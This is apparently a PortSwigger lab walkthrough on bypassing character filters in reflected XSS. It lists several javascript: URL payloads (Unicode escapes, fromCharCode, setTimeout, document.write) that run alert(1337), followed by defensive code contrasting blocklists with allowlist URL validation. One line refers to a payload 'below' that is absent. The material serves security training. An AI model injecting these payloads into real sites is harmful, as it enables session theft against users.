Bypassing Character Restrictions in Reflected XSS - PortSwigger Lab Walkthrough

Introduction
This lab demonstrates how some applications attempt to block certain characters to prevent XSS but fail due to bypass techniques.
Lab Overview
This lab reflects user input in a JavaScript URL context. However, some characters are blocked to mitigate XSS attacks. Our goal is to execute alert(1337) by bypassing these restrictions.
Identifying the Vulnerability
The application reflects user input in a JavaScript URL.
Some special characters are blocked.
We need to find a bypass to execute JavaScript successfully.
Testing Basic XSS Payloads
We first test a basic JavaScript payload:
javascript:alert(1337)
If the alert() function or some characters are blocked, we try:
javascript:eval('alert(1337)')
Or we use Unicode escapes so the literal word alert never appears in the payload:
javascript:\u0061\u006c\u0065\u0072\u0074(1337)
Finding a Working Bypass
If parentheses or alert are blocked, we use alternative execution methods:
Using String.fromCharCode (the call builds the string "alert"; it must be looked up on window before it can be called, otherwise the result is a string and calling it throws a TypeError)
javascript:window[String.fromCharCode(97, 108, 101, 114, 116)](1337)
Using setTimeout
javascript:setTimeout('alert(1337)')
Using document.write
javascript:document.write('<script>alert(1337)<\/script>')
Executing the Attack
Identify which characters are blocked.
Modify the payload to bypass filters.
Inject the payload into the vulnerable parameter.
Execute the XSS attack successfully.
Copy the lab ID and paste it into the given payload below:
Understanding the Impact
This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
Cookie theft using document.cookie
Session hijacking
Phishing attacks
Keylogging or defacement attacks
Conclusion
Even though developers try to block certain characters to prevent XSS, attackers can still find creative ways to bypass these restrictions. This lab teaches us the importance of proper output encoding and context-aware sanitization in preventing XSS.
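To make the conclusion concrete, here is an added example (not part of the lab or this post) that contrasts the kind of character/keyword blocklist the lab relies on with an allowlist check for values that end up in a URL or href context. The blocklist pattern, the base URL and the sample inputs are assumptions constructed for illustration; the sample inputs are the payload shapes shown earlier in the walkthrough.

```javascript
// Added example: blocklist filtering versus allowlist URL validation.
// Not the lab's code; the blocklist and sample inputs are constructed here.

// Naive defence (assumed blocklist): reject any value that mentions "alert".
// Returns null when the value is rejected, otherwise the value unchanged.
function blocklistFilter(input) {
  return /alert/i.test(input) ? null : input;
}

// Robust defence: parse the value as a URL and allow only http/https.
// Anything that fails to parse, or uses another scheme (javascript:, data:,
// vbscript: ...), is replaced by a harmless placeholder. Relative paths are
// resolved against the site's own origin (assumed base URL below).
const ASSUMED_BASE = "https://example.invalid/";
function safeHref(input) {
  let url;
  try {
    url = new URL(String(input), ASSUMED_BASE);
  } catch {
    return "about:blank";
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return "about:blank";
  }
  return url.href;
}

// Constructed sample inputs: the payload shapes from the walkthrough plus
// two legitimate values a real application would want to keep working.
const SAMPLES = [
  "javascript:alert(1337)",
  "javascript:\\u0061\\u006c\\u0065\\u0072\\u0074(1337)",
  "javascript:window[String.fromCharCode(97,108,101,114,116)](1337)",
  "javascript:setTimeout('alert(1337)')",
  "https://example.com/page?x=1",
  "/account/settings",
];

// Runs both defences over the samples and reports, per input, whether the
// blocklist let it through and what the allowlist would emit into the href.
function compareDefences(samples = SAMPLES) {
  return samples.map((input) => ({
    input,
    passedBlocklist: blocklistFilter(input) !== null,
    allowlistHref: safeHref(input),
  }));
}

// Stand-alone run: prints a row per sample for inspection.
for (const row of compareDefences()) {
  console.log(
    `${row.passedBlocklist ? "BLOCKLIST PASS" : "BLOCKLIST REJECT"} | ` +
      `href="${row.allowlistHref}" | ${row.input}`
  );
}
```

The table the script prints makes the lesson visible: the blocklist stops only the first payload, while the Unicode-escaped and fromCharCode variants sail through because the literal word never appears. The allowlist does not care how the scheme or the function name is spelled; it parses the value and keeps only http(s) URLs, so every javascript: variant collapses to about:blank while ordinary links and relative paths survive. The same principle applies to other output contexts: pick the encoder or validator for the context (URL, HTML attribute, JavaScript string) rather than trying to enumerate bad characters.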